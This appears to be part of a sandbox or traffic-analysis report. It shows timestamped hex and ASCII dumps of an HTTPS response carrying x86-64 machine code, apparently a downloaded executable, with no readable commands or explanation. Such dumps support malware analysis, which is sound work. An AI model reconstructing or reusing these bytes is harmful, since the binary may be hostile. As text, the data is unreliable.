                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1921INData Raw: 48 89 51 58 c3 66 0f 1f 44 00 00 b8 01 00 00 00 48 89 51 60 c3 66 0f 1f 44 00 00 b8 01 00 00 00 48 89 51 68 c3 66 0f 1f 44 00 00 b8 01 00 00 00 48 89 51 70 c3 66 0f 1f 44 00 00 b8 01 00 00 00 89 91 98 00 00 00 c3 0f 1f 40 00 b8 01 00 00 00 48 89 91 90 00 00 00 c3 0f 1f 00 48 8b 01 c3 66 66 2e 0f 1f 84 00 00 00 00 00 90 48 8b 41 08 c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 8b 41 58 c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 8b 41 60 c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 8b 41 68 c3 66 66 2e 0f 1f 84 00 00 00 00 00 48 8b 41 70 c3 66 66 2e 0f 1f 84 00 00 00 00 00 8b 81 98 00 00 00 c3 66 0f 1f 84 00 00 00 00 00 48 8b 81 90 00 00 00 c3 0f 1f 84 00 00 00 00 00 48 8d 05 49 5c 61 00 c3 90 90 90 90 90 90 90 90 41 54 57 56 53 48 83 ec 28 48 89 ce 48 89 d3 44 89 c7 48 85
                                                                                                                                                                                                                    Data Ascii: HQXfDHQ`fDHQhfDHQpfD@HHff.HAff.HAXff.HA`ff.HAhff.HApff.fHHI\aATWVSH(HHDH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1937INData Raw: 00 00 00 00 48 89 d1 e9 f7 fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 57 56 53 48 83 ec 20 e8 d4 ee ff ff 48 89 c3 48 85 c0 0f 84 bd 00 00 00 8b 80 04 02 00 00 8b 93 00 02 00 00 39 c2 0f 84 a9 00 00 00 48 8d 3d 2d f4 4b 00 be 0f 00 00 00 48 63 d2 f6 04 93 02 75 2f 83 c0 01 99 c1 ea 1c 01 d0 83 e0 0f 29 d0 48 63 d0 f6 04 93 02 0f 85 84 00 00 00 8b 44 93 40 48 83 c4 20 5b 5e 5f c3 0f 1f 84 00 00 00 00 00 f6 84 93 00 01 00 00 01 0f 85 e2 00 00 00 48 63 93 00 02 00 00 48 89 d1 48 8d 04 93 85 c9 c7 80 00 01 00 00 00 00 00 00 c7 00 00 00 00 00 c7 40 40 00 00 00 00 48 c7 84 d3 40 01 00 00 00 00 00 00 8d 51 ff c7 80 c0 01 00 00 ff ff ff ff 0f 4e d6 8b 83 04 02 00 00 89 93 00 02 00 00 39 d0 0f 85 63 ff ff ff 31 c0 48 83 c4 20 5b 5e 5f c3 90 89 83 04 02
                                                                                                                                                                                                                    Data Ascii: Hff.@WVSH HH9H=-KHcu/)HcD@H [^_HcHH@@H@QN9c1H [^_
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1953INData Raw: b3 ff ff 8b 44 24 3c e9 a6 fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 41 54 55 57 56 53 48 83 ec 40 48 89 d6 4c 89 c7 49 89 cc 44 89 cd e8 25 0f 01 00 48 89 c3 48 89 f8 48 09 f0 0f 84 ba 00 00 00 48 85 f6 0f 84 8f 00 00 00 4c 89 e1 e8 e5 0f 01 00 85 ed 0f 85 b5 00 00 00 4c 89 e1 e8 d5 0f 01 00 49 89 d8 48 89 f1 8d 14 85 00 00 00 00 e8 c3 05 0b 00 48 8d 15 1c c3 0a 00 48 8d 05 35 e5 0a 00 48 89 93 00 02 00 00 4c 89 e1 48 89 83 10 02 00 00 e8 9f 0f 01 00 4c 89 e1 89 c5 e8 95 0f 01 00 8d 14 ad 00 00 00 00 4c 8d 83 f8 00 00 00 89 c1 c1 e9 1f 01 c1 d1 f9 48 63 c9 48 01 f1 e8 e3 05 0b 00 48 8b 05 fc 1f 57 00 48 89 9b f0 01 00 00 48 89 83 08 02 00 00 48 85 ff 74 1d 48 8d 83 f8 00 00 00 4c 89 e1 48 89 83 f8 01 00 00 e8 f3 0e 01 00 f3 0f 6f 07 0f 11 00
                                                                                                                                                                                                                    Data Ascii: D$<ff.@ATUWVSH@HLID%HHHHLLIHHH5HLHLLHcHHWHHHtHLHo
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1969INData Raw: 0f 85 5b 04 00 00 85 c0 74 0b c6 02 00 a8 02 0f 85 61 04 00 00 49 83 c5 40 48 c7 c3 b7 ff ff ff 4d 29 dd 48 29 eb 41 83 fa 38 0f 87 56 03 00 00 8b 44 24 48 48 8b 54 24 40 4c 89 e1 49 01 dd 41 b8 01 00 00 00 49 c1 fd 3f 41 89 86 0c 02 00 00 e8 b6 59 05 00 45 8b 86 b8 01 00 00 41 8b 8e bc 01 00 00 41 8b 96 c0 01 00 00 41 8b 86 c4 01 00 00 f3 41 0f 6f 9e 54 01 00 00 45 21 e8 44 21 e9 44 0b 47 04 0b 4f 08 44 21 ea 44 21 e8 0b 57 0c 0b 47 10 45 23 ae b4 01 00 00 f3 41 0f 6f a6 64 01 00 00 44 0b 2f f3 41 0f 6f ae 74 01 00 00 f3 41 0f 6f 8e 84 01 00 00 f3 41 0f 6f 96 94 01 00 00 0f c8 41 0f c8 89 47 10 44 89 47 04 41 b8 14 00 00 00 0f c9 0f ca 89 4f 08 4c 89 e1 89 57 0c 48 89 fa 41 0f cd 44 89 2f 41 0f 11 9e b4 01 00 00 f3 41 0f 6f 9e a4 01 00 00 41 0f 11 a6 c4
                                                                                                                                                                                                                    Data Ascii: [taI@HM)H)A8VD$HHT$@LIAI?AYEAAAAoTE!D!DGOD!D!WGE#AodD/AotAoAoAGDGAOLWHAD/AAoA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC1985INData Raw: 02 00 00 10 00 00 00 41 c7 84 24 1c 01 00 00 00 00 00 00 e9 d1 fd ff ff 0f 1f 00 41 56 41 55 41 54 53 48 83 ec 38 4d 89 c6 49 89 d4 49 89 cd e8 27 8f 00 00 4c 89 f2 4c 09 e2 48 89 c3 b8 01 00 00 00 74 7c 4d 85 e4 0f 84 86 00 00 00 4c 89 e9 4c 8d ab 20 01 00 00 e8 df 8f 00 00 4c 89 e1 49 89 d8 8d 14 c5 00 00 00 00 e8 5d a6 0a 00 4c 8d 05 96 9f 0a 00 48 89 da 4c 89 e9 41 89 c4 e8 08 b5 01 00 45 85 e4 0f 88 cf 00 00 00 4d 85 f6 0f 84 9e 00 00 00 4c 63 83 e0 02 00 00 4c 89 f2 4c 89 e9 e8 d4 b7 01 00 c7 83 1c 01 00 00 01 00 00 00 c7 83 18 01 00 00 01 00 00 00 b8 01 00 00 00 48 83 c4 38 5b 41 5c 41 5d 41 5e c3 0f 1f 80 00 00 00 00 8b 83 18 01 00 00 4c 63 83 e0 02 00 00 85 c0 75 37 48 8b 8b d8 02 00 00 4c 89 f2 e8 50 d1 24 00 c7 83 1c 01 00 00 01 00 00 00 b8 01
                                                                                                                                                                                                                    Data Ascii: A$AVAUATSH8MII'LLHt|MLL LI]LHLAEMLcLLH8[A\A]A^Lcu7HLP$
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2001INData Raw: e1 e8 c5 26 05 00 41 b8 08 00 00 00 4c 89 fa 4c 89 e9 e8 e4 17 09 00 85 c0 0f 84 8c 00 00 00 ba 08 00 00 00 4c 89 f9 e8 6f 17 09 00 ba 14 00 00 00 4c 89 e9 e8 62 17 09 00 ba 08 00 00 00 48 89 f9 e8 55 17 09 00 4c 89 f1 e8 9d 4f 00 00 ba 08 00 00 00 48 89 c1 e8 40 17 09 00 48 89 f2 4c 89 e1 e8 35 17 09 00 41 bc ff ff ff ff e9 a5 fe ff ff 66 2e 0f 1f 84 00 00 00 00 00 c7 44 24 20 8e 01 00 00 4c 8d 0d 41 2e 4b 00 41 b8 a2 00 00 00 45 31 e4 ba ab 00 00 00 b9 06 00 00 00 e8 49 f3 fe ff e9 6f fe ff ff 0f 1f 40 00 4c 89 f9 ba 08 00 00 00 44 8d 63 f0 e8 df 16 09 00 4c 89 e9 ba 14 00 00 00 e8 d2 16 09 00 ba 08 00 00 00 48 89 f9 e8 c5 16 09 00 4c 89 f1 e8 0d 4f 00 00 ba 08 00 00 00 48 89 c1 e8 b0 16 09 00 e9 26 fe ff ff 0f 1f 00 44 8d 63 f0 e9 1a fe ff ff 0f 1f 80
                                                                                                                                                                                                                    Data Ascii: &ALLLoLbHULOH@HL5Af.D$ LA.KAE1Io@LDcLHLOH&Dc
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2017INData Raw: 04 02 8d 46 04 41 39 c1 7e 3c 48 98 44 0f b6 84 01 80 00 00 00 44 88 04 02 8d 46 05 41 39 c1 7e 25 48 98 83 c6 06 44 0f b6 84 01 80 00 00 00 44 88 04 02 41 39 f1 7e 0e 48 63 f6 0f b6 84 31 80 00 00 00 88 04 32 44 89 0b 41 bc 01 00 00 00 e9 35 fd ff ff 45 89 ca 31 c0 66 90 44 0f b6 84 01 80 00 00 00 44 88 04 02 48 83 c0 01 4c 39 d0 75 ea eb d3 45 89 c8 e9 13 ff ff ff be 10 00 00 00 e9 24 ff ff ff 41 b8 5a 02 00 00 48 8d 15 39 f9 4a 00 48 8d 0d 32 fa 4a 00 e8 7d db 0c 00 90 66 66 2e 0f 1f 84 00 00 00 00 00 90 41 54 57 56 53 48 83 ec 38 44 8b 61 10 4c 89 c3 45 85 e4 0f 85 f7 00 00 00 48 8b 01 41 c7 00 00 00 00 00 f6 40 12 10 74 27 45 31 c9 45 31 c0 ff 50 20 85 c0 78 08 89 03 41 bc 01 00 00 00 44 89 e0 48 83 c4 38 5b 5e 5f 41 5c c3 0f 1f 44 00 00 44 8b 48 04
                                                                                                                                                                                                                    Data Ascii: FA9~<HDDFA9~%HDDA9~Hc12DA5E1fDDHL9uE$AZH9JH2J}ff.ATWVSH8DaLEHA@t'E1E1P xADH8[^_A\DDH
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2033INData Raw: 45 31 e4 ba 77 00 00 00 b9 06 00 00 00 e8 d9 73 fe ff eb cc 0f 1f 80 00 00 00 00 41 54 48 83 ec 30 45 31 e4 89 ca 48 8d 4c 24 28 e8 fb 30 fa ff 48 85 c0 74 03 44 8b 20 48 8b 4c 24 28 e8 89 39 fe ff 44 89 e0 48 83 c4 30 41 5c c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 8b 01 c3 66 66 2e 0f 1f 84 00 00 00 00 00 66 90 41 54 48 83 ec 30 45 31 e4 49 89 c8 48 8d 4c 24 28 41 8b 10 e8 a7 30 fa ff 48 85 c0 74 03 44 8b 20 48 8b 4c 24 28 e8 35 39 fe ff 44 89 e0 48 83 c4 30 41 5c c3 66 66 2e 0f 1f 84 00 00 00 00 00 41 54 48 83 ec 20 49 89 cc 48 85 c9 74 13 b8 ff ff ff ff f0 0f c1 41 08 83 e8 01 85 c0 74 11 7e 0f 48 83 c4 20 41 5c c3 0f 1f 84 00 00 00 00 00 49 8b 44 24 10 48 85 c0 74 1a 48 8b 80 a8 00 00 00 48 85 c0 74 0e 4c 89 e1 ff d0 49 c7 44 24 28 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: E1wsATH0E1HL$(0HtD HL$(9DH0A\ff.@ff.fATH0E1IHL$(A0HtD HL$(59DH0A\ff.ATH IHtAt~H A\ID$HtHHtLID$(
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2049INData Raw: c0 e9 f2 fe ff ff 0f 1f 44 00 00 b8 01 00 00 00 eb 93 66 0f 1f 84 00 00 00 00 00 45 31 c0 e9 10 fe ff ff 0f 1f 84 00 00 00 00 00 31 c0 e9 c6 fe ff ff 66 0f 1f 84 00 00 00 00 00 48 8d 44 24 50 48 89 44 24 38 e9 94 fd ff ff 90 41 54 53 48 83 ec 28 48 89 cb 48 8b 09 41 89 d4 48 85 c9 74 23 e8 16 dc 05 00 41 39 c4 7d 19 48 8b 0b 44 89 e2 48 83 c4 28 5b 41 5c e9 0f dc 05 00 0f 1f 80 00 00 00 00 31 c0 48 83 c4 28 5b 41 5c c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 41 54 48 83 ec 20 49 89 cc e8 92 f2 05 00 85 c0 75 0e 4c 89 e1 48 83 c4 20 41 5c e9 28 d1 23 00 31 c0 48 83 c4 20 41 5c c3 90 90 90 90 90 90 90 b8 40 00 00 00 c3 66 2e 0f 1f 84 00 00 00 00 00 83 fa 03 75 13 b8 01 00 00 00 41 c7 01 a0 02 00 00 c3 66 0f 1f 44 00 00 b8 fe ff ff ff c3 66 90 41 55 41 54
                                                                                                                                                                                                                    Data Ascii: DfE11fHD$PHD$8ATSH(HHAHt#A9}HDH([A\1H([A\ATH IuLH A\(#1H A\@f.uAfDfAUAT
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2065INData Raw: fe ff ff 0f 1f 84 00 00 00 00 00 c7 44 24 20 c4 00 00 00 4c 8d 0d b1 43 4a 00 41 b8 69 00 00 00 45 31 e4 ba 66 00 00 00 b9 34 00 00 00 e8 b9 f3 fd ff e9 a4 fe ff ff 0f 1f 40 00 c7 44 24 20 c8 00 00 00 4c 8d 0d 81 43 4a 00 41 b8 68 00 00 00 45 31 e4 ba 66 00 00 00 b9 34 00 00 00 e8 89 f3 fd ff e9 74 fe ff ff 0f 1f 40 00 4c 89 e9 e8 28 50 ff ff 48 98 48 89 03 e9 5e fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 57 53 48 83 ec 28 41 b9 b6 00 00 00 4c 8d 05 2d 43 4a 00 48 8b 59 28 48 8b 53 28 48 8b 4b 20 48 8d 7b 08 48 83 e7 f8 e8 b4 23 00 00 48 8b 53 18 48 8b 4b 10 41 b9 b7 00 00 00 4c 8d 05 ff 42 4a 00 e8 9a 23 00 00 48 8b 93 30 04 00 00 48 8d 4b 30 e8 ba 16 08 00 48 c7 03 00 00 00 00 31 c0 48 c7 83 30 04 00 00 00 00 00 00 48 29 fb 8d 8b 38 04 00 00 c1
                                                                                                                                                                                                                    Data Ascii: D$ LCJAiE1f4@D$ LCJAhE1f4t@L(PHH^ff.WSH(AL-CJHY(HS(HK H{H#HSHKALBJ#H0HK0H1H0H)8
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2081INData Raw: 0f 1f 00 43 0f b7 44 1a fe 66 42 89 44 19 fe e9 54 ff ff ff 0f 1f 80 00 00 00 00 41 8b 12 89 50 01 43 8b 44 1a fc 42 89 44 19 fc e9 38 ff ff ff 0f 1f 00 b8 ff ff ff ff e9 2d ff ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 41 57 41 56 41 55 41 54 55 57 56 53 48 83 ec 38 48 89 cb 48 89 d7 4c 89 c6 4d 85 c0 0f 84 a6 00 00 00 48 8d 69 10 80 09 40 4c 8b 61 28 4c 8b 41 30 48 89 ea 41 ff d4 48 89 f2 48 83 43 20 01 41 89 f3 48 c1 ea 08 48 89 54 24 20 48 89 d1 48 81 fe ff fe 00 00 0f 87 85 00 00 00 0f b6 53 10 31 c0 31 ca 88 d0 0f b6 53 11 31 f2 88 d4 66 89 43 10 b8 02 00 00 00 66 2e 0f 1f 84 00 00 00 00 00 4c 8b 43 30 83 f8 0f 77 23 48 85 f6 74 1e 89 c1 83 c0 01 48 83 c7 01 48 83 ee 01 0f b6 54 0b 10 32 57 ff 88 54 0b 10 83 f8 0f 76 dd 48 89 ea 48 89 e9 41 ff
                                                                                                                                                                                                                    Data Ascii: CDfBDTAPCDBD8-ff.AWAVAUATUWVSH8HHLMHi@La(LA0HAHHC AHHT$ HHS11S1fCf.LC0w#HtHHT2WTvHHA
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2097INData Raw: 41 8b 57 0c 41 0f 11 8f 88 01 00 00 0f ca 41 0f 11 47 40 89 54 24 28 ba 01 00 00 00 48 83 bc 24 b8 00 00 00 0f 76 27 84 d2 74 23 44 8b 4c 24 2c 48 8b 44 24 30 49 8d 57 60 49 8d 4f 40 4d 8d 87 88 01 00 00 ff d0 c7 44 24 2c 00 00 00 00 48 81 bc 24 b8 00 00 00 ff 0b 00 00 0f 86 de 00 00 00 49 8d 47 60 49 8d 9c 24 00 0c 00 00 4d 89 fc 48 89 44 24 40 49 8d 47 40 49 8d 6f 10 48 89 44 24 48 48 8d 83 00 f4 ff ff 44 8b 7c 24 28 4c 8b b4 24 a8 00 00 00 48 89 44 24 38 49 89 c5 66 0f 1f 44 00 00 41 83 c7 01 49 89 f8 48 89 ea 4c 89 e1 ff d6 44 89 f8 49 83 c5 10 49 83 c6 10 0f c8 41 89 44 24 0c 49 8b 46 f0 49 33 44 24 10 49 89 45 f0 49 8b 46 f8 49 33 44 24 18 49 89 45 f8 49 39 dd 75 c0 4c 8b 44 24 38 48 8b 54 24 40 41 b9 00 0c 00 00 49 8d 9d 00 0c 00 00 81 44 24 28 c0
                                                                                                                                                                                                                    Data Ascii: AWAAG@T$(H$v't#DL$,HD$0IW`IO@MD$,H$IG`I$MHD$@IG@IoHD$HHD|$(L$HD$8IfDAIHLDIIAD$IFI3D$IEIFI3D$IEI9uLD$8HT$@AID$(
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2113INData Raw: d1 88 48 19 0f b6 48 08 44 8d 14 09 c1 f9 07 45 09 d0 44 88 40 18 44 0f b6 40 07 47 8d 14 00 41 c1 f8 07 44 09 d1 88 48 17 0f b6 48 06 44 8d 14 09 c1 f9 07 45 09 d0 44 88 40 16 44 0f b6 40 05 47 8d 14 00 41 c1 f8 07 44 09 d1 88 48 15 0f b6 48 04 44 8d 14 09 c1 f9 07 45 09 d0 44 88 40 14 44 0f b6 40 03 47 8d 14 00 41 c1 f8 07 44 09 d1 88 48 13 0f b6 48 02 44 8d 14 09 45 09 d0 c1 f9 07 44 31 ca 44 88 40 12 44 0f b6 40 01 47 8d 14 00 41 c1 f8 07 44 09 d1 88 48 11 0f b6 08 01 c9 44 09 c1 88 48 10 88 50 1f 48 8b 43 58 44 0f b6 40 1f 0f b6 48 1e 0f b6 50 10 47 8d 0c 00 44 8d 14 09 41 c1 f8 07 c1 f9 07 45 09 d0 c0 fa 07 44 88 40 2e 44 0f b6 40 1d 83 e2 87 47 8d 14 00 41 c1 f8 07 44 09 d1 88 48 2d 0f b6 48 1c 44 8d 14 09 c1 f9 07 45 09 d0 44 88 40 2c 44 0f b6 40
                                                                                                                                                                                                                    Data Ascii: HHDED@D@GADHHDED@D@GADHHDED@D@GADHHDED1D@D@GADHDHPHCXD@HPGDAED@.D@GADH-HDED@,D@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2129INData Raw: 04 00 4d 85 f6 74 03 4c 89 30 48 85 ed 74 04 48 89 68 08 48 85 ff 0f 84 a2 00 00 00 48 89 78 10 e9 99 00 00 00 66 0f 1f 44 00 00 b9 03 00 00 00 41 0f 11 34 24 e8 a1 24 ff ff 48 8b 0d 7a 48 5e 00 4c 89 e2 e8 72 97 04 00 b9 02 00 00 00 89 c3 e8 86 24 ff ff 85 db 0f 84 ae 00 00 00 83 c6 01 39 35 d5 75 3f 00 7e 8b b9 03 00 00 00 e8 69 24 ff ff b9 18 00 00 00 41 b8 70 00 00 00 4c 89 fa e8 96 21 ff ff b9 02 00 00 00 49 89 c4 e8 49 24 ff ff 4d 85 e4 75 94 c7 44 24 20 73 00 00 00 4c 8d 0d a5 48 49 00 41 b8 41 00 00 00 45 31 ed ba 6a 00 00 00 b9 08 00 00 00 e8 2d f3 fc ff 48 8b 0d fe 47 5e 00 e8 d1 a5 04 00 e9 c3 fe ff ff 0f 1f 40 00 b9 03 00 00 00 e8 fe 23 ff ff e8 69 90 04 00 b9 02 00 00 00 48 89 05 cd 47 5e 00 e8 e8 23 ff ff 48 8b 0d c1 47 5e 00 48 85 c9 0f 85
                                                                                                                                                                                                                    Data Ascii: MtL0HtHhHHxfDA4$$HzH^Lr$95u?~i$ApL!II$MuD$ sLHIAAE1j-HG^@#iHG^#HG^H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2145INData Raw: 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 e8 07 31 00 00 48 83 c4 58 c3 66 90 48 83 ec 58 48 c7 44 24 40 00 00 00 00 49 89 c8 49 89 d1 48 8b 0d 56 26 54 00 48 c7 44 24 38 00 00 00 00 48 8d 15 2a 96 4a 00 c7 44 24 30 00 00 00 00 48 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 e8 67 35 00 00 48 83 c4 58 c3 66 90 48 83 ec 38 4c 89 4c 24 28 49 89 d1 48 8d 15 09 96 4a 00 4c 89 44 24 20 49 89 c8 48 8b 0d de 22 54 00 e8 69 3f 00 00 48 83 c4 38 c3 0f 1f 40 00 48 83 ec 38 4c 89 4c 24 28 49 89 d1 48 8d 15 d9 95 4a 00 4c 89 44 24 20 49 89 c8 48 8b 0d ae 22 54 00 e8 99 1e 00 00 48 83 c4 38 c3 0f 1f 40 00 48 83 ec 58 48 c7 44 24 40 00 00 00 00 49 89 c8 49 89 d1 48 8b 0d 96 25 54 00 48 c7 44 24 38 00 00 00 00 48 8d 15 92 95 4a 00 c7 44 24 30 00 00 00 00 48 c7
                                                                                                                                                                                                                    Data Ascii: $(HD$ 1HXfHXHD$@IIHV&THD$8H*JD$0HD$(HD$ g5HXfH8LL$(IHJLD$ IH"Ti?H8@H8LL$(IHJLD$ IH"TH8@HXHD$@IIH%THD$8HJD$0H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2161INData Raw: 83 ec 68 48 8b 84 24 a8 00 00 00 48 89 44 24 30 49 89 d2 49 89 cc 4d 89 cd 48 8b 84 24 a0 00 00 00 4c 89 44 24 20 48 8d 54 24 4c 45 31 c0 48 8d 4c 24 58 4d 89 d1 48 c7 44 24 50 00 00 00 00 48 89 44 24 28 48 c7 44 24 58 00 00 00 00 e8 d9 eb ff ff 85 c0 74 45 48 8b 44 24 58 44 8b 44 24 4c 48 8d 54 24 50 4c 89 e9 48 89 44 24 50 41 ff d4 49 89 c4 48 85 c0 74 33 48 8b 4c 24 58 41 b8 22 00 00 00 48 8d 15 91 58 4a 00 e8 bc 9f fe ff 4c 89 e0 48 83 c4 68 41 5c 41 5d c3 45 31 e4 4c 89 e0 48 83 c4 68 41 5c 41 5d c3 90 41 b8 0d 00 00 00 ba 67 00 00 00 b9 09 00 00 00 c7 44 24 20 21 00 00 00 4c 8d 0d 51 58 4a 00 e8 1c 73 fc ff eb a7 90 90 90 90 90 90 90 90 90 90 41 57 41 56 41 55 41 54 56 53 48 81 ec 68 04 00 00 49 89 ca 4c 89 4c 24 30 49 89 d4 4c 89 c3 4c 89 44 24 28
                                                                                                                                                                                                                    Data Ascii: hH$HD$0IIMH$LD$ HT$LE1HL$XMHD$PHD$(HD$XtEHD$XDD$LHT$PLHD$PAIHt3HL$XA"HXJLHhA\A]E1LHhA\A]AgD$ !LQXJsAWAVAUATVSHhILL$0ILLD$(
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2177INData Raw: 00 c7 44 24 20 cb 00 00 00 4c 8d 0d 1b 27 4a 00 e8 d6 33 fc ff 31 c0 48 83 c4 40 5b 41 5c 41 5d 41 5e 41 5f c3 66 0f 1f 44 00 00 48 8b 43 20 31 db 4c 8b 78 20 4c 8b 60 08 49 8b 46 10 48 8b 08 e8 e6 4d ff ff 41 89 c5 eb 1b 90 4c 89 e1 89 da e8 36 dc 03 00 48 8b 08 e8 ce 4d ff ff 44 39 e8 74 4e 83 c3 01 4c 89 e1 e8 0e dc 03 00 39 c3 7c da e8 75 6c f8 ff 48 89 c3 48 85 c0 74 5d e8 48 66 f8 ff 48 89 43 08 48 85 c0 74 4f 44 89 e9 e8 a7 4a ff ff 48 89 da 4c 89 e1 48 89 03 48 8b 43 08 c7 00 05 00 00 00 e8 0f d7 03 00 85 c0 74 67 4c 89 f2 4c 89 f9 e8 00 d7 03 00 85 c0 0f 95 c0 0f b6 c0 48 83 c4 40 5b 41 5c 41 5d 41 5e 41 5f c3 66 2e 0f 1f 84 00 00 00 00 00 48 89 d9 e8 18 6c f8 ff 41 b8 41 00 00 00 ba 67 00 00 00 c7 44 24 20 de 00 00 00 4c 8d 0d 2e 26 4a 00 b9 21
                                                                                                                                                                                                                    Data Ascii: D$ L'J31H@[A\A]A^A_fDHC 1Lx L`IFHMAL6HMD9tNL9|ulHHt]HfHCHtODJHLHHCtgLLH@[A\A]A^A_f.HlAAgD$ L.&J!
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2193INData Raw: c2 4c 8b 07 4c 8b 4f 08 4c 8b 57 10 4c 89 c8 49 c1 e9 14 48 c1 e0 2c 4c 89 d1 49 c1 ea 28 48 c1 e1 18 49 01 c0 49 11 c9 49 83 d2 00 4c 89 c0 49 83 c0 05 4c 89 c9 49 83 d1 00 49 83 d2 00 49 c1 ea 02 49 0f 45 c0 49 0f 45 c9 48 03 02 48 13 4a 08 48 89 06 48 89 4e 08 48 8b 7c 24 08 48 8b 74 24 10 f3 c3 66 66 2e 0f 1f 84 00 00 00 00 00 66 66 2e 0f 1f 84 00 00 00 00 00 66 66 2e 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 ff ff ff 00 00 00 00 00 ff ff ff 00 00 00 00 00 ff ff ff 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 ff ff ff 03 00 00 00 00 ff ff ff 03 00 00 00 00 ff ff ff 03 00 00 00 00 ff ff ff 03 00 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 03 00 00 00 02 00 00 00
                                                                                                                                                                                                                    Data Ascii: LLOLWLIH,LI(HIIILILIIIIEIEHHJHHNH|$Ht$ff.ff.ff.fD
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2209INData Raw: 05 3a 09 5d 00 00 00 00 00 48 8b 0d 3b 09 5d 00 e8 a6 66 03 00 31 d2 48 c7 05 29 09 5d 00 00 00 00 00 89 15 f3 08 5d 00 48 83 c4 28 c3 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 41 54 57 56 53 48 83 ec 38 41 bc 01 00 00 00 48 8b 41 28 49 89 c0 48 89 cb 48 8b 49 08 49 29 c8 49 39 d0 0f 83 9c 00 00 00 44 8b 63 10 48 8b 73 20 45 85 e4 0f 85 9e 00 00 00 49 89 f0 49 89 f1 49 29 c8 49 d1 e9 49 39 d0 0f 82 89 00 00 00 90 4c 39 c8 0f 82 b7 00 00 00 8b 53 14 85 d2 0f 85 cc 00 00 00 41 b8 7f 02 00 00 48 8d 15 af a9 49 00 48 89 f1 e8 67 e1 fd ff 48 89 c7 48 85 ff 0f 84 eb 00 00 00 48 8b 13 4c 8b 43 08 48 89 f9 e8 74 51 21 00 8b 43 14 48 8b 53 28 85 c0 0f 84 ad 00 00 00 48 8b 0b 41 b9 86 02 00 00 4c 8d 05 6d a9 49 00 e8 58 e4 fd ff 48 89 3b 41 bc 01 00 00 00 48 89 73
                                                                                                                                                                                                                    Data Ascii: :]H;]f1H)]]H(ff.ATWVSH8AHA(IHHII)I9DcHs EIII)II9L9SAHIHgHHHLCHtQ!CHS(HALmIXH;AHs
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC2225INData Raw: 41 5c 5d 5b 5f 5e f3 c3 90 90 90 48 89 7c 24 08 48 89 74 24 10 48 89 e0 48 89 cf 48 89 d6 4c 89 c2 4c 89 c9 48 09 f6 75 0c 48 8b 7c 24 08 48 8b 74 24 10 f3 c3 53 41 54 41 55 49 89 f3 49 89 d4 49 89 cd 4d 31 d2 48 31 c9 48 8d 7f 08 44 8a 57 f8 8a 4f fc 83 bf 00 01 00 00 ff 0f 84 2a 04 00 00 44 8b 05 f3 7b 8d 00 48 31 db 41 fe c2 4c 29 d3 4d 29 e5 42 8b 04 97 49 f7 c3 f0 ff ff ff 0f 84 d6 03 00 00 41 0f ba e0 1e 0f 82 5b 01 00 00 48 83 e3 07 49 8d 72 01 74 41 49 29 db 00 c1 8b 14 8f 89 04 8f 42 89 14 97 00 d0 41 fe c2 8b 14 87 42 8b 04 97 41 32 14 24 43 88 14 2c 4d 8d 64 24 01 48 ff cb 75 d6 49 8d 72 01 eb 0e 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 00 c1 8b 14 8f 89 04 8f 8b 1c b7 49 c1 c8 08 42 89 14 97 00 c2 44 8a 04 97 00 d9 8b 14 8f 89 1c 8f 8b 44 b7
                                                                                                                                                                                                                    Data Ascii: A\][_^H|$Ht$HHHLLHuH|$Ht$SATAUIIIM1H1HDWO*D{H1AL)M)BIA[HIrtAI)BABA2$C,Md$HuIrff.IBDD
